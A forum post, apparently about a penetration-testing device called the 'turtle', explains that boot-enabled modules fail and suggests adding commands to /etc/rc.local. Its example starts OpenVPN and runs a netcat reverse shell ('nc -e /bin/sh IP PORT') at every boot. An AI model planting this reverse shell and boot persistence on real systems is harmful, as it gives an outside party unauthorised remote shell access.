Jump to content

Moduled enabled on boot do not work


scavmartin

Recommended Posts

See the following threads, It appears a lot of the modules start on boot does not work. A workaround for anyone reading this is to add the command in /etc/rc.local

 

For example I enable OpenVPN and start a nc reverse shell and my /etc/rc.local looks like this. Note there is no service or systemctl on the turtle

/etc/init.d/openvpn start
#sh reverse shell
 nc -e /bin/sh IP PORT
#Add your commands above this line
exit 0

 

Edited by scavmartin
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...